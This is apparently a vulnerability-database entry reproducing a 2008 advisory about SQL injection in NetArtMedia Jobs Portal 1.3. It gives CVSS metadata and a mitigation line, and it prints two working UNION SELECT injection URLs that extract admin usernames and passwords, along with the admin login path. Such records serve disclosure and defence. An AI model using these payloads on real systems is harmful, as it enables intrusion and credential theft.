NetArtMedia Jobs Portal 1.3 Multiple Sql Injection Vulnerabilities

vendor:

Jobs Portal

by:

R4Q!4N H4CK3R

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Jobs Portal

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: YES

Related CWE: N/A

CPE: a:netartmedia:jobs_portal

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

NetArtMedia Jobs Portal 1.3 Multiple Sql Injection Vulnerabilities

NetArtMedia Jobs Portal 1.3 is vulnerable to multiple SQL injection vulnerabilities. An attacker can exploit these vulnerabilities to gain access to sensitive information such as usernames and passwords. The vulnerable files are index.php and login.php. The PoC for the exploit is /index.php?mod=search&job=-666 union select 1,2,3,4,5,username,password,8,9,10,11,12,13,14 from websiteadmin_admin_users and /index.php?page_id=-1&news_id=-666 union select 1,2,username,password,5,6 from websiteadmin_admin_users.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a SQL query.

Source

Exploit-DB raw data:

######## ##    ##  ######  ########  ##    ## ########  ########  #######  ########
##       ###   ## ##    ## ##     ##  ##  ##  ##     ##    ##    ##     ## ##     ##
##       ####  ## ##       ##     ##   ####   ##     ##    ##           ## ##     ##
######   ## ## ## ##       ########     ##    ########     ##     #######  ##     ##
##       ##  #### ##       ##   ##      ##    ##           ##           ## ##     ##
##       ##   ### ##    ## ##    ##     ##    ##           ##    ##     ## ##     ##
######## ##    ##  ######  ##     ##    ##    ##           ##     #######  ########
################################ !R4Q!4N H4CK3R  ###################################
NetArtMedia Jobs Portal 1.3  Multiple Sql Injection Vulnerabilities
Website    : http://www.netartmedia.net
Founded By : Encrypt3d.M!nd
Home Page  : http://encrypt3d.blogspot.com

# Remote Sql Injection(s) :
Affected File(s) :
index.php
 
PoC:
/index.php?mod=search&job=-666 union select 1,2,3,4,5,username,password,8,9,10,11,12,13,14 from websiteadmin_admin_users
/index.php?page_id=-1&news_id=-666 union select 1,2,username,password,5,6 from websiteadmin_admin_users
Administration Panel:
/ADMIN/login.php

# Greetz:
MY Sweet,L!0N,EL Mariachi,-=MizO=-,Shadow Administrator,
KoRn The Dog,MiNi-SpIder,All My Friends

The EnD :D

# milw0rm.com [2008-09-21]